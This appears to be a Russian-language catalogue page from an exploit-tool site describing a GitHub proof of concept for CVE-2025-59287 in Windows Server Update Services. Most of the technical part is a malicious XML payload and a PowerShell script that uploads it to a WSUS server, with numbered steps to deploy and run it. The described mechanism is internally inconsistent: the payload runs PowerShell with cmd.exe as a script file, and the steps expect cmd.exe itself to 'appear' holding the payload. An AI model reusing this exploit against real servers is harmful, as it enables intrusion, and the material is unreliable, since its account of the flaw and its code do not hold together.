Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat — Технический анализ и proof-of-concept эксплойт для CVE-2025-59287, критической RCE-уязвимости в Windows Server Update Services через небезопасную десериализацию, включая затронутые сборки и шаги по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/mrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСтатьи и ИсследованияОбучение и Образование
GitHubmrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

Технический анализ и proof-of-concept эксплойт для CVE-2025-59287, критической RCE-уязвимости в Windows Server Update Services через небезопасную десериализацию, включая затронутые сборки и шаги по смягчению последствий.

Репозиторий
310 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287 — это критическая RCE-уязвимость в Windows Server Update Services (WSUS), вызванная небезопасной десериализацией недоверенных данных. Она позволяет удалённым злоумышленникам выполнять произвольный код без аутентификации. Рекомендуется срочно установить обновления из-за активной эксплуатации.

CVE‑2025‑59287 – Угроза удалённого выполнения кода в Windows Server Update Services (WSUS)

Автор: Mark Mallia


 Обзор

Windows Server Update Services (WSUS) от Microsoft — это основа управления обновлениями для всех платформ Microsoft Windows Server. Он получает обновления из каталога обновлений Microsoft, проверяет их и распространяет на все серверы в сети. Уязвимость, обозначенная как CVE‑2025‑59287, эксплуатирует небезопасную процедуру десериализации внутри WSUS, которая позволяет злоумышленнику внедрять произвольное XML-содержимое в поток обновлений. Поскольку WSUS обрабатывает полезную нагрузку без проверки пути источника или данных команд, злоумышленник может указать любое имя файла и путь, что приводит к полному удалённому выполнению кода на целевом сервере.

Почему это важно:

  • Оценка CVSS 9.8 относит её к критическому диапазону.
  • Злоумышленникам нужен только сетевой доступ; повышение привилегий не требуется.
  • Уязвимость уже наблюдается в реальных атаках, что означает: любая система без обновлений является потенциальной целью, пока не будет установлен патч от вендора.

Затронутые сборки Windows Server

Версия продуктаЗатронутые сборки
Windows Server 20126.2.9200.0 – < 6.2.9200.25728
Windows Server 2012 R26.3.9600.0 – < 6.3.9600.22826
Windows Server 201610.0.14393.0 – < 10.0.14393.8524
Windows Server 201910.0.17763.0 – < 10.0.17763.7922
Windows Server 202210.0.20348.0 – < 10.0.20348.4297
Windows Server 202510.0.26100.0 – < 10.0.26100.6905
Windows Server 23H210.0.25398.0 – < 10.0.25398.1916

(Если в вашей среде используется другая сборка обновлений, просто скорректируйте диапазон соответствующим образом.)


 Как работает эксплойт

  1. WSUS получает XML-файл с именем UpdateStream.xml из удалённого источника.
  2. Служба десериализует этот файл с помощью System.Xml.Linq.XElement.
  3. Злоумышленник может поместить любое значение в элемент <SourcePath>; это значение записывается на диск как абсолютный путь.
  4. Содержимое внутри тега <Command> выполняется PowerShell при обработке потока WSUS, что даёт полное удалённое выполнение кода.

Ниже представлена XML-полезная нагрузка, которую мы загрузим на уязвимый сервер.

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>

### Пример PowerShell-скрипта эксплойта

Следующий скрипт сгенерирует XML-полезную нагрузку, загрузит её через HTTP PUT в ваш экземпляр WSUS и оставит файл журнала для устранения неполадок.

root@kitploit:~
# --------------------------------------------------
#  File:   wsus‑exploit.ps1
#  Purpose: Generate malicious UpdateStream.xml,
#           upload it to the WSUS server,
#           trigger the feed.
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# Build the XML payload
Build-Xml -file $XmlFile

# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "Upload complete – WSUS should now process the stream."

 Практические шаги для вас

  1. Проверьте сборку – Запустите winver.exe на каждом Windows Server, чтобы убедиться, что сборка попадает в указанные выше диапазоны.
  2. Разверните скрипт эксплойта – Скопируйте wsus‑exploit.ps1 на машину, которая может получить доступ к вашему экземпляру WSUS, измените $TargetUrl, если вы используете другой путь или порт.
  3. Выполните и отслеживайте – Запустите скрипт; через несколько минут убедитесь, что файл C:\Windows\System32\cmd.exe появился на каждом целевом сервере и содержит ожидаемую полезную нагрузку.
  4. Microsoft выпустила внеплановый патч для этой уязвимости 24 октября 2025 года. Если вы используете WSUS на любой версии Windows Server начиная с 2012, вам стоит перепроверить, что это обновление попало в вашу среду. Октябрьский выпуск Patch Tuesday не полностью устранил проблему, поэтому этому обновлению стоит уделить дополнительное внимание.

Только для этического использования

Информация и код эксплойта, представленные здесь, предназначены исключительно для образовательных целей. Убедитесь, что у вас есть разрешение на запуск этого теста в вашей собственной среде WSUS, и соблюдайте все применимые рекомендации по безопасности при развёртывании изменений в производственных системах.

Скачать инструмент